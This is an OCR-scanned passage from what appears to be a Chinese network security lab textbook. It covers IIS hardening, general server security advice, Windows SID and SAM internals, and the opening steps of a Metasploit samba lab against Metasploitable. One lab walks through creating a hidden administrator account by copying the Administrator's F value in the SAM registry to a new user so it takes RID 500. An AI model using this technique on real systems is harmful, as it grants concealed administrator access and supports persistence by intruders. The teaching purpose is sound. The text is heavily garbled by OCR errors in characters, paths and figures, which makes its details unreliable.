A 2-57 删除 服务 器 共享 


步骤 12: IIS 站 点 设置 。 对 于 提供 Web 服务 的 Windows Server 服务 磊 , 需 要 通过 安全 
设置 加 强 对 服务 右 的 安全 管理 。 选 择 “ 开 始 ” 一 “管理 工具 ”一 “Internet 信息 服务 管理 ”一 
“网 站 ”选项 ,在 打开 的 “Internet 信息 服务 (IIS) 管 理 器 ”对 话 框 中 ,显示 了 该 服务 器 上 已 经 发 
布 的 网 站 名 称 , 如 图 2-58 所 示 。 
天 Internet 信息 服务 (IIS) 管 理 器 i Ps 


Cg 文件 操作 人) SEV EOW 帮助 0 | edel x 
com xm z»run 
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三 ] CHAR. asp 

7| Chkadnin asp 


E] elassaana. asp 


| | classeanal. asp 


| classaana2 asp 


B]2-58 “Internet 信息 服务 (IIS) 管 理 器 ?对话 框 


需要 注意 的 是 ,在 发 布 网 站 时 ,网 站 所 在 的 文件 一 定 不 要 存放 在 系统 盘 (C: ) 下 ,要 将 网 

站 目录 数据 和 系统 盘 分 开 ,建议 将 网 站 目录 和 数据 存放 在 单独 的 磁盘 空间 中 。 
同时 ,在 IS 管理 硕 中 删除 没有 用 到 的 映射 , 仅 保留 asp.aspx, html, htm 等 映射 即 可 。 
具体 可 在 选择 “默认 网 站 ”后 右 击 ,在 出 现 的 快捷 菜单 中 选择 “文档 ”选项 ,在 打开 的 如 图 2-59 
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所 示 的 对 话 框 中 进行 删除 。 

在 IIS 管理 器 中 ,可 以 将 “HTTP404 Object Not Found” 出 错 页 面 通过 URL 重 定 向 到 
一 个 定制 HTM 文件 。 具 体 方法 为 : 选择 “默认 网 站 ?并 右 击 ,在 出 现 的 快捷 菜单 中 选择 “ 属 
性 ”选项 ,在 出 现 的 对 话 框 中 选择 “ 自 定 义 错误 ”选项 ,在 打开 的 对 话 框 中 选取 *404” 错 误 页 面 
的 位 置 , 如 图 2-60 所 示 。 


| 应 朵 程序 配置 


C: WINDOWS‘\help\ii vinee onM403-. . 
C: WINDOWSNhelphiisHelpNcommonh403. hi — 
C: nit dy i iss eid un hi 
A monMO3-.. 
picommon tU4b. 1 


Ar 
. asmx C: WINS Wc 


a3 Vin 2 GET. g | 


C: NOE lp nr mo 
C: WINDOWSNhelpMi i sHelp*co 

C: WINDOWSXhelpiisHelp'commo 
C: NINDOWSNhelphii sic cans 
C: WINDOWSXhelpiiisHelphcommo 
C: WINDOWSNhelp'iisHelp*commo 
F.- NWTNDIWSSheln533 


2-59 删除 没有 用 到 的 映射 


单 击 “ 编 辑 ” 按 钮 ,在 打开 的 如 图 2-61 所 示 
的 对 话 框 中 单 击 “ 浏 览 * 按 钮 ,选取 新 的 404 错误 
页 面 文件 。 可 在 服务 硕 任 意 位 置 编 写 一 个 
HTM 文件 ,并 将 其 设置 为 错误 页 面 。 

步骤 13: 使 用 应 用 程序 池 来 隔离 应 用 程序 。 
在 IIS 管理 器 中 可 以 将 应 用 程序 隔离 到 应 用 程 
序 池 。 应 用 程序 池 是 包含 一 个 或 多 个 URL 的 
一 个 组 ,由 一 个 工作 进程 或 一 组 工作 进程 对 应 图 2-61 选取 新 的 404 错误 页 面 文件 
用 程序 池 提 供 服 务 。 因 为 每 个 应 用 程序 都 独立 
于 其 他 应 用 程序 运行 ,所 以 使 用 应 用 程序 池 可 以 提高 Web 服务 絮 的 可 靠 性 和 安全 性 。 在 
Windows MEHR a AS EDU. 以 确定 此 进程 如 何 访问 
系统 资源 。 每 个 应 用 程序 池 也 有 一 个 进程 标识 ,此 标识 是 一 个 以 应 用 程序 需要 的 最 低 权 限 
运行 的 账户 ,可 以 允许 使 用 此 进程 标识 匿名 访问 相应 的 网 站 或 应 用 程序 。 

首先 创建 应 用 程序 地。 双击 “Internet 信息 服务 (11IS) 管 理 器 ”, 选 择 “ 应 用 程序 池 ” 选 项 
并 右 击 ,在 出 现 的 快捷 菜单 中 选择 “新 建 >“ 应 用 程序 池 ” 选 项 ,如 图 2-62 所 示 。 

在 打开 的 “添加 新 应 用 程序 池 ” 对 话 框 中 ,为 应 用 程序 池 输 入 一 个 新 ID, 如 输入 
testAppPool。 在 “应 用 程序 池 设 置 ” 选 项 区 域 中 ,选中 “对 新 的 应 用 程序 池 使 用 默认 设置 " 单 
选 按 钮 ,然后 单 击 “ 确 定 ” 按 钮 ,如 图 2-63 所 示 。 

接着 ,将 网 站 或 应 用 程序 分 配 到 应 用 程序 池 中 。 双 击 “Internet 信息 服务 (IIS) 管 理 器 ”， 
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xi + | (4 Gair 

R3 Internet 信息 服务 描述 

see WII 1 
PIP 站 点 Jafttsshar ePointappPool 


EM 


图 2-62 ”新建 应 用 程序 池 


选取 用 户 想 要 分 配 到 该 应 用 程序 池 中 的 网 站 或 应 用 程序 (本 实验 以 “默认 网 站 ”为 例 ) ,然后 
在 其 上 右 击 ,在 出 现 的 快捷 菜单 中 选择 “属性 ”选项 ,在 打开 的 对 话 框 中 选择 “ 主 目录 ”选项 
卡 ,打开 如 图 2-64 所 示 的 对 话 框 。 在 “应 用 程序 池 ” 下 拉 列 表 框 中 选择 需要 的 网 站 或 应 用 程 
序 名 称 (本 实验 使 用 前 面 创建 的 testAppPool) ,确定 需要 指定 的 网 站 或 应 用 程序 名 称 ,然后 
单 击 “ 确 定 ” 按 钮 即 可 。 


添加 新 应 用 程序 池 X 
X 


testAppPool | 


图 2-63 添加 新 应 用 程序 池 图 2-64 设置 应 用 程序 池 对 应 的 网 站 或 应 用 程序 名 称 


2.6.4 任务 与 思考 
服务 天 是 互联 网 应 用 中 提供 大 量 可 共享 资源 的 基础 设施 ,其 安全 性 决定 应 用 的 安全 性 
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和 可 靠 性 。 提 高 服务 器 的 安全 可 以 通过 以 下 方法 进行 相应 的 安全 设置 。 

1. 及 时 安装 系统 补丁 

不 论 是 Windows 还 是 Linux, 抑 或 是 各 类 数据 库 和 应 用 软件 ,都 有 可 能 存在 漏洞 。 为 
存在 漏洞 的 软件 及 时 安装 补丁 避免 漏洞 被 蓄意 攻击 利用 是 服务 器 安全 最 重要 的 保障 之 一 。 

2. 安装 和 设置 防火 墙 

现在 有 许多 基于 便 件 或 软件 的 防火 墙 ,很 多 安全 厂商 也 都 推出 了 相关 的 产品 。 对 服务 
句 安 全 而 言 ,安装 防火 墙 非常 上 必要。 防火 墙 对 于 非法 访问 具有 很 好 的 预防 作用 ,但 是 安装 了 
防火 墙 并 不 意味 着 安全 得 到 了 保障 。 在 安装 防火 墙 之 后 ,用户 需 要 根据 月 身 的 网 络 环境 ,对 
防火 墙 进行 适当 的 配置 以 达到 最 好 的 防护 效果 。 

3. 安装 网 络 杀 毒 软 件 

现在 网 络 上 的 计算 机 病毒 木马、 蠕虫 等 恶意 代码 非常 狙 狐 , 这 就 需要 在 网 络 服务 器 上 
安装 相应 版 本 的 杀毒 软件 控制 病毒 等 恶意 代码 的 传播 。 同 时 ,在 网 络 杀 毒 软件 的 使 用 过 程 
中 ,必须 及 时 升级 且 每 天 月 动 更 新 病毒 库 。 

4. 关闭 不 需要 的 服务 和 端口 

服务 器 操作 系统 在 安装 时 ,会 启动 一 些 不 需要 的 服务 ,不 仅 会 占用 系统 的 资源 ,而 且 会 
增加 系统 的 安全 隐患 。 对 于 一 段 时 间 内 完全 不 会 用 到 的 端口 ,可 以 全 部 将 其 关闭 。 

5. 定期 对 服务 器 进行 备份 

为 了 防止 无 法 预料 的 系统 故障 或 用 户 不 小 心 的 非法 操作 ,必须 对 系统 进行 安全 备份 。 
除了 对 全 系统 进行 周期 性 (如 两 个 月 一 次 ) 的 备份 外 ,还 应 该 将 重要 系统 文件 存放 在 不 同 服 
Far E ,以 便 在 系统 出 现 骨 溃 时 ( 通 篆 是 硬盘 出 错 ) ,可 以 及 时 地 将 系统 恢复 到 正常 状态 。 

6. 账号 和 密码 保护 

账号 和 密码 保护 可 以 说 是 服务 需 系 统 的 第 一 道 防 线 , 目 前 网 络 上 大 部 分 对 服务 需 系 统 
的 攻击 都 是 从 截获 或 猜测 密码 开始 的 。 一 且 攻 击 者 进入 系统 ,那么 前 面 的 防范 措施 几乎 就 
失去 了 作用 ,所 以 对 服务 器 系统 管理 员 的 账号 和 密码 进行 保护 是 保证 系统 安全 非常 重要 的 
措施 。 


7. 监测 系统 日 志 


通过 运行 系统 日 志 程 序 , 系 统 会 记录 下 所 有 用 户 使 用 系统 的 情形 ,包括 最 近 登 录 时 间 、 
使 用 的 账号 .进行 的 活动 等 。 日 志 程 序 会 定期 生成 报表 ,通过 对 报表 进行 分 析 , 系 统管 理 员 
可 以 知道 是 否 有 异常 现象 发 生 ,以 便 采 取 必 要 的 安全 防护 措施 。 


2.7 Windows 登录 安全 的 实现 


2.7.1 预备 知识 : 登录 安全 介绍 


当 用 户 通 过 各 类 互联 网 终端 进行 网 络 文 付 等 操作 时 ,首先 要 执行 登录 指定 的 系统 ,其 目 
的 是 对 用 户 身 份 的 合法 性 进行 验证 。 在 登录 过 程 中 ,系统 要 求 用 户 输入 账号 名 称 、 密 码 及 用 
户 的 映 份 证 号 码 等 信息 ,之 后 青 由 客户 端 软件 与 服务 右 端 进行 通信 ,通过 信息 交换 完成 用 户 
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的 身份 认证 过 程 。 在 这 一 过 程 中 ,一 旦 用 户 的 登录 过 程 被 攻击 者 监视 或 动 持 ,通信 和 数据 被 截 
获 或 破解 ,将 会 产生 严重 的 安全 问题 。 

1. 认证 过 程 中 存在 的 安全 隐患 

根据 对 各 类 安全 事件 的 综合 分 析 , 目 前 较为 严重 的 安全 隐患 主要 有 两 个 方面 : 由 加 密 
机 制 的 不 健全 引起 的 安全 问题 和 由 服务 器 证 书 验 证 产生 的 安全 问题 。 

(1) 加 密 机 制 安 全 问题 。 加 密 机 制 安 全 问题 是 指 因 加 密 算 法 或 方法 不 完整 或 过 于 简 
单 , 而 被 攻击 者 动 持 和 破解 。 数 据 加 密 既 是 信息 安全 中 采用 最 为 广泛 的 一 种 方法 ,也 是 其 他 
安全 技术 的 基础 和 保障 。 目 前 ,银行 客户 端 等 安全 应 用 的 登录 加 密 机 制 一 般 采 用 HTTPS 
和 ”HTTP 十 数据 加 密 ? 两 种 方式 。 其 中 ,大 部 分 安全 客户 端 采 用 目前 互联 网 通用 的 
HTTPS 加 密 机 制 ,但 也 有 部 分 安全 客户 端 采 用 “HTTP 十 数据 加 密 ” 机 制 。 

(2) 服务 器 证 书 验证 安全 问题 。 服 务 器 证 书 验证 存在 的 安全 问题 主要 集中 在 当 客 户 端 
登录 服务 器 时 ,在 通信 过 程 中 不 对 服务 器 端 喘 份 的 合法 性 进行 验证 ,从 而 导致 登录 过 程 容易 
被 “中间人 ”攻击 支持 。 这 样 的 安全 问题 构成 的 威胁 较为 严重 ,因为 在 日 常 应 用 中 , 绝 大 多 数 
情况 是 由 服务 器 认证 客户 端 身 份 的 合法 性 ,也 就 是 说 在 这 个 认证 系统 中 ,实现 认证 功能 的 服 
务 器 被 认为 是 绝对 可 靠 的。 但 是 ,在 实际 应 用 中 ,如 果实 现 身 份 认 证 的 服务 器 不 可 靠 或 是 虚 
假 的 ,那么 整个 认证 系统 将 会 出 现 混乱 。 

2. SID 


SID(Security Identifiers, ERPI) Œ Windows Server 操作 系统 中 用 于 标识 用 户 、 
组 和 计算 机 账户 的 唯一 号 码 。 在 第 一 次 创建 用 户 、 组 和 计算 机 账户 时 ,将 给 网 络 上 的 每 一 个 
账户 发 布 一 个 唯一 的 SID。Windows Server 中 的 内 部 进程 将 引用 账户 的 SID 而 不 是 账户 
的 用 户 或 组 名 。 如 果 创 建 了 一 个 账户 后 马上 将 其 删除 ,然后 使 用 相同 的 用 户 名 创建 男 一 个 
账户 , 则 新 账户 将 不 具有 授权 给 前 一 个 账户 的 权力 或 权限 ,原因 是 该 账户 具有 不 同 的 SID 
号 但 。 

用 户 通 过 验证 后 ,登录 进程 会 给 用 户 一 个 访问 令 牌 ,该 令 牌 相当 于 用 户 访问 系统 资源 的 
票证 , 当 用 户 试 图 访问 系统 资源 时 ,将 访问 令 牌 提供 给 Windows Server, 然后 Windows 
Server 检查 用 户 试 图 访问 对 象 上 的 访问 控制 列表 。 如 果 用 户 被 允许 访问 该 对 象 ,Windows 
Server 将 会 分 配给 用 户 适当 的 访问 权限 。 

访问 令 牌 是 用 户 通过 验证 时 由 登录 进程 所 提供 的 ,所 以 改变 用 户 的 权限 需要 注销 后 重 
新 登录 ,再 次 获取 访问 令 牌 。 


2.7.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 读者 掌握 Windows Server 2003 环境 下 用 户 的 登录 及 和 号 份 认 证 过 程 (其 
他 版 本 的 Windows Server 操作 系统 与 此 类 似 ) ,理解 SID .访问 令 牌 、 SAM WWE x 3E de d 
看 用 户 SID 的 方法 和 创建 一 个 具有 管理 员 权 限 的 隐藏 账户 的 方法 。 

2. 实验 条 件 

本 实验 可 以 运行 在 有 Windows Server 2003 或 其 他 Windows Server 版 本 的 计算 机 上 ， 
该 计算 机 既 可 以 是 一 台 物 理 机 ,也 可 以 是 一 台 虚 拟 机 。 
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2.7.3 实验 过 程 


本 实验 可 以 分 为 以 下 几 个 组 成 部 分 。 

1. 查看 管理 员 用 户 的 SID 

可 以 使 用 whoami 等 工具 (该 工具 包含 在 Windows Server Resource Kit 中 ) 查 看 与 登 
录 会 话 相关 的 SID, 具 体 步 骤 如 下 。 

步骤 1: 选择 "开始 ?一 "运行 ?选项 ,在 出 现 的 “运行 ?对 话 框 中 输入 “cmd” 命 令 , 然 后 单 
击 “ 确 定 ” 按 钮 ,打开 命令 提示 符 窗 口 。 

步骤 2: 在 光标 闪烁 处 输入 “whoami /?” 命 令 ,查看 命令 的 所 有 功能 。 

步骤 3: 输入 "whoami /user” 命 令 , 可 查看 用 户 的 SID, 如 图 2-65 所 示 。 


ce ETH E E 
Microsoft Windows RÆ 5.2.3798] 
«C» 版 权 所 有 1985-2083 Microsoft Corp. 


C:\Documents and Settings Vidministrator»whoani /user 


C:\Documents and Settings VMdministrator? 


图 2-65 AAH SID 


从 图 2-65 中 可 以 看 到 ,输入 “whoami /user” 命 令 后 ,可 以 查看 到 用 户 名 为 Administrator 
用 户 的 SID Jj S-1-5-21-3678246790-28846023256-576550818-500。 其 中 ,可 以 看 到 SID 市 
有 前 级 S, 它 的 各 个 部 分 之 间 用 连 字 符 “-” 隐 开 : 第 1 个 数字 (本 实验 中 的 1) 是 修订 版 版 号 ; 
第 2 个 数字 是 标识 符 颁 发 机 构 代 码 ( 对 Windows 2003 来 说 是 固定 的 数字 505 然后 是 4 个 
了 颁发 机 构 代 码 ( 本 例 中 是 21 和 后 续 的 3 个 长 数字 串 ) 和 一 个 相对 标识 符 (Relative 
IdenTifier, RID, 本 实验 中 是 500)。SID 中 的 一 部 分 是 各 系统 或 域 唯一 具有 的 ,而 另 一 部 分 
(RID) 是 跨 所 有 系统 和 域 共 享 的 。 当 然 安 家 Windows 2003 时 ,本 地 计算 机 会 颁发 一 个 随机 
的 SID, 比 如 创建 一 个 Windows 2003 域 时 , 它 也 被 指定 一 个 唯一 的 SID。 于 是 对 任何 的 
Windows 2003 计算 机 或 域 来 说 , 子 颁发 机 构 代 码 总 是 唯一 的 (除非 故意 修改 或 复制 ,如 某 些 
撒 层 的 磁盘 复制 技术 ),RID 对 所 有 的 计算 机 或 域 来 说 部 是 一 个 常数 。 例 如 ,市 有 RID 500 
的 SID 总 是 代表 本 地 计算 机 的 真正 Administrator 账户 ,RID 501 是 Guest 账户 。 

2. 查看 新 建 用 户 的 SID 

主要 操作 步骤 如 下 。 

步骤 1: 在 命令 提示 符 窗 口 的 光标 闪烁 处 输入 “net user Tuser/add” 命 令 ,添加 一 个 新 
用 户 账户 (本 实验 为 Tuser) ,如 图 2-66 HZR. 

步骤 2: 用 户 新 建成 功 后 ,注销 管理 员 账 户 ,以 刚刚 创建 的 Tuser 用 户 的 身份 重新 登录 
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:SDocuments and Settings Mdninistrator net user Tuser /add 
AN À m à 
命令 成 功 完成 。 


:NDocuments and Settings Mdnministrator> 


图 2-66 添加 用 户 tuser 


Windows 系统 。 

步骤 3: 重新 打开 命令 提示 符 窗 口 ,再 次 输入 ”whoami /user” 命 令 , 可 以 看 到 用 户 名 和 
用 户 SID 都 改变 了 ,如 图 2-67 所 示 。 从 图 中 可 以 看 出 ,用 户 Tuser 的 RID 与 Administrator 
的 RID 不 同 。 在 域 环境 中 ,从 1000 开始 的 RID 代表 用 户 账 户 。 


ct C: MINDOWSTsysten321cmd exe — =|D| x| 
Microsoft Windows TUE S 5.2.37981 
«C» 版 权 所 有 1985-2003 Microsoft Corp. 


C:\Documents and Settings\Iuser>2>whoami /user 


el ESEN E S A ATA A TOE ENE eMe 


dcn-otuoxlam3p5*stuser $-1-5-21-3678246798-2846023256-—576558818-10903 


C: Documents and Settings 'Tuser»? 


图 2-67 查看 用 户 tuser 的 SID 


例如 ,在 本 实验 中 RID 是 该 域 中 创建 的 第 9 位 用 户 ,Windows 2003( 或 者 使 用 适当 工具 
的 恶意 攻击 者 ) 总 是 将 具有 RID 500 的 账户 识别 为 管理 员 。 

3. 创建 一 个 具有 管理 员 权 限 的 隐藏 账 已 

在 前 面 的 预备 知识 和 其 他 章节 中 已 经 大 概 介绍 了 SAM 和 SID 的 相关 知识 ,下 面 在 此 
基础 上 由 读者 来 创建 一 个 具有 管理 员 权 限 的 隐藏 账户 。 

步骤 1: 注销 Tuser 用 户 , 以 用 户 Administrator 的 身份 重新 登录 Windows 操作 系统 。 

步骤 2: 在 "运行 ?对 话 框 中 输入 "regedit "命令 ,打开 "注册 表 编 辑 天 ”对话 框 , 将 对 SAM 
的 权限 设置 为 完全 控制 ,如 图 2-68 Bran o 

重新 输入 “regedit” 命 令 ,然后 在 HKLMNSAMNSAMNdomainsNaccountN H 5& F dX $1 Hj 
P! Administrator 和 Tuser, 如 图 2-69 所 示 。 

SAM 数据 库 位 于 注册 表 HKLMNSAMNSAM 下 ,受到 ACLCAccess Control List ,访问 
控制 列表 ) 保 护 , 它 在 人 硬盘 上 保存 在 “% systemroot% system32\config\” 目 录 下 的 sam 文件 
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nsa (Hv FR 


C FERRNA rr 


由 -HEEY CLASSES ROOT (长 度 为 零 的 二 进位 值 ) 


+- HEEY_CURRENT_USER 


一 多 | 000003EE 
-— (Cg 000003EF 
Cg 000003F0 
-£ 000003F2 
-的 000003F3 
t- Names 
|^] Administrator 
Sm] Guest 
-| IUSR_VM-3TZRGYGZYXXS 
(Lg IWAM_VM-3TZRGYGZYXXS | 


2-69 注册 表 编 辑 器 窗口 


H, Windows 活动 目录 域 (或 本 机 ) 中 的 SAM 内容 存放 在 Domain 中 ,其 下 有 两 个 分 支 , 即 
Account 和 Builtin ,其 中 \Domains\Account 是 用 户 账户 内 容 。 

(D \Domains\ Account\ User 下 是 各 账户 的 信息 ,其 下 的 子 键 是 各 个 账户 的 SID 相对 标 
识 符 , 如 000001F4 是 管理 员 RID。 

© \Domains\Account\Names\ 下 是 用 户 账户 名 ,每 个 账户 名 只 有 一 个 默认 的 子 项 , 子 
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项 中 的 类 型 不 是 一 般 的 注册 表 数 据 类 型 ,而 是 指 回 标志 这 个 账户 的 SID 相对 标识 从 。 例 
如 , 子 项 中 的 Administrator ,类 型 为 0xlf4, 于 是 \Dinaubs\Account\Users 中 的 000001F4 
就 对 应 账户 名 Administrator 的 内 容 。 再 如 ,本 实验 中 的 Tuser, 类 型 为 0x3f2, 于 是 
\Domains\Account\User 中 的 000003F2 就 对 应 着 账户 名 Tuser 的 内 容 , 以 此 类 推 。 

值得 注意 的 是 ,默认 情况 下 ,管理 员 无 法 直接 访问 SAM 数据 库 , 如 果 要 查看 SAM 数据 
JE ,需要 使 用 Regedt32 来 修改 访问 权限 。 本 实验 中 的 SAM 也 必须 赋予 完全 控制 权限 。 具 
体操 作 过 程 为 : 在 注册 表 编 辑 器 中 右 击 SAM 文件 夹 下 的 SAM 子 文件 夹 ,在 出 现 的 快捷 菜 
单 中 选择 “权限 ”命令 ,在 打开 的 “SAM 的 权限 ?对 话 框 中 选择 Administrator 用 户 ,在 权限 列 
表 中 将 “完全 控制 ”设置 为 “允许 ” 即 可 ,如 图 2-70 所 示 。 


NWEG3IITI. 

TFE 4:40) EEV KELA) Ehu 

日 m 我 的 电脑 1 名 称 
由 -加 MKEY CLASSES RETT 
-a MKEY CURRENT — 
a0 meram 28 | 
EI-E ssa id — 
|| 全 SECURITY Adninistrators N OXLAMSPS\A 
| BC SOFTYARE 
| m SYSTEM 
m C] WEY USERS 
(€ (C) KKEY, CURRENT. 1 


2-70 ”为 SAM 赋予 完全 控制 权限 


4. 复制 了 项 

前 文 提 到 ,在 \Domains\Account\User 目录 下 存放 着 各 种 账号 的 信息 ,其 中 每 个 账号 
下 面 有 两 个 子 项 :下 项 和 V 项。 

V 项 中 保存 的 是 账户 的 基本 资料 ,包括 用 户 名 、 用 户 全 称 (full name) , 所 属 组 、 摘 述 、 密 
码 Hash 注释 .是 否 可 以 更 改 密码 .账户 启用、 密码 设置 时 间 等 。 

F 项 中 保存 的 是 一 些 登 录 记 录 , 包 括 上 次 登录 时 间 、 错 误 登 录 次 数 等 ,还 有 一 个 重要 
的 一 一 这 个 账号 的 SID 相对 标识 符 。 

因此 ,要 创建 一 个 具有 管理 员 权 限 的 隐藏 账户 ,就 必须 复制 Administrator 用 户 的 下 项 
内 容 到 某 一 账户 。 例 如 ,要 将 Administrator 用 户 的 下 项 内 容 复 制 给 Tuser, 具体 做 法 是 : 
选取 User 文件 夹 下 000003F2 子 文件 夹 (上 一 节 已 经 进行 了 介绍 ,这 个 子 文件 夹 对 应 于 
Names 文件 夹 下 的 Tuser 子 文件 夹 ) 的 FF 项 ,将 Administrator 的 下 项 内 容 复制 给 Tuser 即 
可 ,如 图 2-71 所 示 。 
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CLASSES ROOT | M6 SI RIEGER) 
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QUID CET. LOCAL, ACKTENSAINS AM Domains Account User s 00000175. 


图 2-71 复制 F 项 中 的 内 容 


注销 Administrator 用 户 ,以 用 户 Tuser 的 身份 重新 登录 操作 系统 。 在 命令 提示 符 窗口 
中 通过 “whoami /user” 命 令 查 看 用 户 Tuser 的 SID, 会 发 现 该 用 户 的 SID 由 1000 变 成 了 
500, 具 有 了 管理 员 权 限 ,如 图 2-72 所 示 , 至 此 用 户 Tuser 与 管理 员 用 户 Administrator 的 
SID 变 得 完全 一 样 。 


[^ C: MINDOTS Wsystem32|1emd. exe PE 
Microsoft Windows [RE 5.2.3790) 
《C》 版 权 所 陶 1985-2003 Microsoft Corp. 


EC:*Documents and Settings Wdninistrator whoani /user 


二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 二 
二 二 二 一 二 一 二 二 -一 一 二 二 二 二 二 


sd-fhaus9hnudkc\adninistrator S-1-5-21-3416811936-3707106819-2955160413-5090 


:NDocuments and Settings Mdninistrator>, 


图 2-72 Tuser 的 SID 5 Administrator 的 SID 值 完 全 一 样 
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至 此 可 以 看 出 ,本 实验 之 所 以 可 以 克隆 一 个 具有 管理 员 权 限 的 用 户 , 是 因为 SID 的 相 
对 标识 符 RID 在 注册 表 中 的 一 个 账号 中 出 现 了 两 次 ,一 个 是 在 子 键 000001F4 中 , 另 一 个 就 
在 Ff 项 的 内 容 中 ,从 48 到 51 的 4 字 节 : F4010000, 这 实际 上 是 一 个 长 类 型 变量 ,也 就 是 
000001F4。 当 一 个 标识 出 现在 两 个 地 方 时 就 将 发 生 同 步 问 题 。 显 然 , 微 软 公司 在 这 个 问题 
上 犯 了 一 个 错误 ,两 个 变量 本 应 该 统一 标识 为 一 个 用 户 账 号 ,但 是 微软 公司 在 设计 
Windows 操作 系统 时 将 两 个 变量 分 别 发 挥 各 自 的 作用 , 却 没 有 通过 同步 方式 统一 起 来 , 因 
此 在 Windows 登录 时 ,将 从 SAM 中 获得 相对 标识 符 , 而 这 个 相对 标识 符 的 位 置 是 下 值 中 
的 F4010000。 但 是 ,账户 信息 查询 却 是 使 用 SAM 中 Names 子 键 的 内 容 。 

需要 指出 的 是 ,针对 SAM 数据 的 修改 是 具有 人 危险 性 的 ,如 果 不 能 正确 地 修改 将 使 
SAM 文件 遭 到 破坏 ,造成 系统 无 法 启动 或 启动 后 无 法 正常 工作 等 问题 。 


2.7.4 任务 与 思 


在 本 实验 的 基础 上 ,读者 可 以 继续 学 习 Windows 的 登录 及 身份 认证 过 程 。 

Windows Server 必须 确定 自己 是 否 在 与 合法 的 安全 主体 ( 即 合 法 的 用 户 ) 进 行 交互 ,这 
是 通过 认证 实现 的 ,其 中 最 简单 的 例子 就 是 用 户 的 登录 及 身份 认证 过 程 。 一 个 完整 的 
Windows 登录 过 程 要 经 过 以 下 4 个 步骤 。 

(OD 用 户 按 Ctrl 十 Alt 十 Del 组 合 键 ,引起 的 人 硬件 中 断 被 系统 捕获 后 ,使 操作 系统 激活 
WinLogon 进程 (这 是 一 个 登录 进程 )。WinLogon 进程 通过 调用 标识 与 鉴别 dll, 将 登录 和 窗 
口 (账号 名 和 口令 登录 提示 符 ) 展 示 在 用 户 面 前 ,要 求 用 户 输入 一 个 用 户 名 和 和 密码。 

(2) WinLogon 将 用 户 名 和 密码 传递 给 本 地 安全 认证 (Local Security Authority. 
LSA) 。 

(3) LSA 查询 安全 账号 管理 需 (Security Account Manager,SAM) 数 据 库 ,以 确定 用 户 
名 和 密码 是 否 属 于 授权 的 系统 用 户 。 如 果 用 户 名 和 密码 合法 ,SAM 把 该 用 户 的 SID 及 该 
用 户 所 属 组 的 SID 返回 给 LSA。LSA 使 用 这 些 信 息 创 建 一 个 访问 令 牌 (Access Token) ,每 
当 用 户 请 求 访问 一 个 受 保护 资源 时 ,LSA 就 会 将 访问 令 牌 显示 出 来 以 代 蔡 用 户 的 "标记 ”。 

(4) WinLogon 进程 传送 访问 令 牌 到 Win32 模块 ,同时 发 出 一 个 请 求 , 以 便 为 用 户 建 立 
登录 进程 。 登 录 进 程 建立 用 户 环境 ,包括 启动 Desktop Explorer 和 背景 等 。 

随 着 微软 公司 对 安全 越 来 越 重 视 , 对 Windows 操作 系统 的 启动 及 用 户 登 录 认 证 过 程 也 
做 了 大 量 的 改进 ,读者 可 以 查阅 具体 Windows 版 本 的 启动 和 登录 认证 资料 ,并 通过 相关 实 
验 进行 验证 和 测试 。 


2.8 利用 samba 漏洞 进行 渗透 


漏洞 是 系统 设计 和 开发 过 程 中 存在 的 缺陷 ,补丁 则 是 针对 已 发 现 漏 洞 的 修补 程序 ,漏洞 
在 发 现 后 未 被 修复 就 可 能 会 被 攻击 者 利用 。 


2.8.1 预备 知识 : 了 解 Windows 系统 漏洞 
Windows 2&2 isi] Bl Windows 操作 系统 本 身 存 在 的 技术 缺陷。 漏洞 的 存在 严重 威胁 
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着 Windows 系统 的 安全 ,漏洞 的 发 现 和 利用 成 为 网 络 攻防 学 习 的 重点 。 

通过 对 漏洞 的 利用 ,攻击 者 可 以 实现 本 地 权限 的 提升 和 远程 代码 的 执行 等 操作 。 利 用 
远程 执行 代码 的 汤 洞 ,攻击 者 可 以 通过 网 络 发 起 远程 攻击 直接 获取 目标 主机 的 访问 权 并 进 
入 系统 。 然 后 ,攻击 者 再 利用 本 地 权限 提升 型 漏洞 ,将 获得 的 受 限 用 户 权限 提升 到 管理 员 权 
限 ,进而 获得 目标 主机 的 完整 控制 权 。 


漏洞 是 指 在 一 个 信息 系统 的 硬件 、 软 件 或 固件 的 需求 设计、 实现 .配置 .运行 等 过 程 中 
本 意 留 下 或 无 意 中 产生 的 一 个 或 右 干 个 缺陷 , 它 会 导致 该 信息 系统 处 于 风险 之 中 。 漏 洞 控 


掘 是 指 采 用 一 定 的 信息 技术 方法 去 发 现 . 分 析 和 利用 信息 系统 中 漏洞 的 过 程 。 
2.8.2 实验 目的 和 条 件 


1. 实验 目的 
通过 本 实验 ,读者 重点 擎 握 以 下 内 容 。 
(D 了 解 Metasploitable 系统 的 漏洞 。 
(2) 学 习 使 用 Metasploit 工具 。 
2. 实验 条 件 
本 实验 所 需要 的 软 便 件 清单 如 表 2-1 所 示 。 
表 2-1 利用 samba 漏洞 进行 渗透 实验 清单 


1 数量 


18 


攻击 机 | 操作 系统 版 本 Kali Linux 
X 
m EE NEN 操作 系统 版 本 Ubuntu 操作 系统 


Hm 


2.8.3 实验 过 程 


步骤 1: 打开 丢 机 ,正常 登录 系统 。 然 后 使 用 “ifconfig” 命 令 查 看 靶 机 的 I 地址 ,如 图 2-73 
HIZR o 


asfadmin@metasploitable:”$ 


asfadmin@metasploitable:”$ 
eth Link encap:Etherneé TWaddr 6c:9e:72:31:a5:6a 


inet addr [172 16.1.35 ] Bcast:172.16.1.255  Mask:255.255.255. 
inet6 addr: fe80::6e9e:?2ff :fe31:a56a/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST  MTU:1500 Metric:1 


RX packets:38658 errors:0 dropped:0 overruns:O franme:0 
TX packets:94 errors:0 dropped:0 ouerruns:O carrier:0 
collisions:O txqueuelen:1000 

RX bytes:O (0.0 B) TX bytes:0 (0.0 B) 

Base address:0xc000 Memory:feba0000-f ebcOO000 


2-73 ”查看 靶 机 的 IP 地址 


需要 说 明 的 是 ,如 果 丢 机 的 IP 地 址 是 通过 配置 DHCP 服务 需 目 动 获取 的 ,每 次 查看 随 
机 的 IP 地 址 时 ,其 值 可 能 不 同 。 在 实验 中 建议 使 用 静态 IP 地 址 。 
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步骤 2i: 打开 攻击 机 ,以 root 用 户 正 常 登 录 系 统 。 然 后 使 用 “ifconfig” 命 令 查 看 其 IP 地 
址 ,如 图 2-74 所 示 。 


root@nilk: ~# 
eth6 Link encap: HWaddr 6c: 80; 1e: d4; 62: c4 


inet addr: Bcast:172.16.1.255 Mask: 255, 255, 255, 0 
